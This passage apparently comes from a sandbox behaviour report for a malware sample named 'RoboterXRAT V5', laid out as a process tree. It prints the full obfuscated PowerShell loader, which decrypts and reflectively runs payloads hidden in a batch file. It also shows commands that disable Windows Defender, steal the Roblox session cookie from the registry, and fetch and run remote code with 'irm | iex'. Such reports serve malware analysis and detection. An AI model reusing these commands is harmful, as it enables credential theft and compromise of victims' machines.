        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        
        PID:5672
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        13⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        13⤵
        
        PID:3304
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:6068
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        Views/modifies file attributes
        
        PID:5848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        14⤵
        
        PID:2000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        
        PID:5568
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        14⤵
        
        PID:1692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        14⤵
        
        PID:3128
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:5276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5952
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        14⤵
        Detects videocard installed
        
        PID:3828
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6116
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        12⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        12⤵
        
        PID:1368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        10⤵
        
        PID:5476
        
        C:\Windows\system32\net.exe
        
        net file
        11⤵
        
        PID:5688
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        12⤵
        
        PID:5704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6048
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        
        PID:5224
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        11⤵
        
        PID:1848
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        
        PID:1500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        9⤵
        
        PID:4920
        
        C:\Windows\system32\net.exe
        
        net file
        10⤵
        
        PID:2328
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        11⤵
        
        PID:3684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:664
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        
        PID:5544
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        10⤵
        
        PID:5576
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        10⤵
        
        PID:5600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        8⤵
        
        PID:4580
        
        C:\Windows\system32\net.exe
        
        net file
        9⤵
        
        PID:1060
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        10⤵
        
        PID:3812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        
        PID:3480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        7⤵
        
        PID:4676
        
        C:\Windows\system32\net.exe
        
        net file
        8⤵
        
        PID:1984
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        9⤵
        
        PID:1688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        
        PID:3728
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        6⤵
        
        PID:3168
        
        C:\Windows\system32\net.exe
        
        net file
        7⤵
        
        PID:1992
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        8⤵
        
        PID:4356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3392
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        Executes dropped EXE
        
        PID:3148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:896
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4400
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:3392
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3828
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        Executes dropped EXE
        
        PID:1156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3812
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2152
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:4880
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4716
  - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
      "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1684
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        Executes dropped EXE
        
        PID:1096
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        Executes dropped EXE
        
        PID:780
      - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4148
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        8⤵
        
        PID:3304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
